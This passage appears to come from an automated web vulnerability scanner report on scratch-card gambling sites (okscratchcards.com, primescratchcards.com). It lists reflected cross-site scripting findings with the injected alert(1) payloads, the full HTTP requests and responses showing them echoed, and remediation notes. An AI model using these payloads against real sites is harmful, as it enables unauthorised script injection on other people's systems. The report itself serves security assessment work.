<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4ebe8"-alert(1)-"bda4796c29a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b68"-alert(1)-"b52c242e1ba was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM25b68"-alert(1)-"b52c242e1ba";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.94. http://home.okscratchcards.com/help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f790"-alert(1)-"75a755f3e70 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM7f790"-alert(1)-"75a755f3e70; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: BO=FM7f790"-alert(1)-"75a755f3e70; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7f790"-alert(1)-"75a755f3e70";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af511"-alert(1)-"3a9f6fdf6e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMaf511"-alert(1)-"3a9f6fdf6e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://okscratchcards.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70343'-alert(1)-'89d3bb43680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?70343'-alert(1)-'89d3bb43680=1 HTTP/1.1
Host: okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 11:40:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.okscratchcards.com/?70343'-alert(1)-'89d3bb43680=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e45f0"%3balert(1)//7fd470c036e was submitted in the ARC cookie. This input was echoed as e45f0";alert(1)//7fd470c036e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e45f0"%3balert(1)//7fd470c036e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e45f0%22%3Balert%281%29%2F%2F7fd470c036e; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137e45f0";alert(1)//7fd470c036e' border='0' width='1' height='1'>
...[SNIP]...

3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload e4f61--><script>alert(1)</script>89a53cc69f9 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e4f61--><script>alert(1)</script>89a53cc69f9; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137e4f61%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E89a53cc69f9; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137e4f61--><script>alert(1)</script>89a53cc69f9">
...[SNIP]...

3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48d54'%3balert(1)//d85284f838d was submitted in the ARC cookie. This input was echoed as 48d54';alert(1)//d85284f838d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013748d54'%3balert(1)//d85284f838d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013748d54%27%3Balert%281%29%2F%2Fd85284f838d; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013748d54';alert(1)//d85284f838d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b048'%3balert(1)//c701db3fcc6 was submitted in the ARC cookie. This input was echoed as 7b048';alert(1)//c701db3fcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b048'%3balert(1)//c701db3fcc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301377b048%27%3Balert%281%29%2F%2Fc701db3fcc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301377b048';alert(1)//c701db3fcc6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload ad971--><script>alert(1)</script>f13763517ed was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ad971--><script>alert(1)</script>f13763517ed; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137ad971%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef13763517ed; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137ad971--><script>alert(1)</script>f13763517ed">
...[SNIP]...

3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f1e"%3balert(1)//469e8a0b361 was submitted in the ARC cookie. This input was echoed as d5f1e";alert(1)//469e8a0b361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5f1e"%3balert(1)//469e8a0b361; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137d5f1e%22%3Balert%281%29%2F%2F469e8a0b361; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137d5f1e";alert(1)//469e8a0b361' border='0' width='1' height='1'>
...[SNIP]...

3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b11"%3balert(1)//4b7eb4d38ea was submitted in the ARC cookie. This input was echoed as 38b11";alert(1)//4b7eb4d38ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013738b11"%3balert(1)//4b7eb4d38ea; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013738b11%22%3Balert%281%29%2F%2F4b7eb4d38ea; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013738b11";alert(1)//4b7eb4d38ea' border='0' width='1' height='1'>
...[SNIP]...

3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload d5a37--><script>alert(1)</script>2daf1f805c5 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5a37--><script>alert(1)</script>2daf1f805c5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137d5a37%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2daf1f805c5; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

